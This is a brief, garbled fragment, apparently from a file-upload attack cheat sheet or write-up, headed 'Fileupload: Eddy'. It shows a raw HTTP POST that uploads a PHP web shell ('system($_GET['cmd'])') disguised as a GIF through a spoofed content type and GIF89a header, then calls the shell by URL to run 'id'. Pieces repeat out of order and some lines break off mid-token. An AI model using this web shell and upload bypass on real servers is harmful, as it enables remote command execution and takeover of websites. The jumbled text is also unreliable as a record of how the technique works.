Fileupload: Eddy

http://target.com/uploads/20250213_184512_9923.php?cmd=id Output:

File uploaded successfully: /uploads/20250213_184512_9923.php Access the uploaded shell: fileupload eddy

POST /upload HTTP/1.1 Host: target.com Content-Type: multipart/form-data; boundary=----WebKitFormBoundary ------WebKitFormBoundary Content-Disposition: form-data; name="file"; filename="shell.php" Content-Type: image/gif http://target

GIF89a; <?php system($_GET['cmd']); ?> ------WebKitFormBoundary-- filename="shell.php" Content-Type: image/gif GIF89a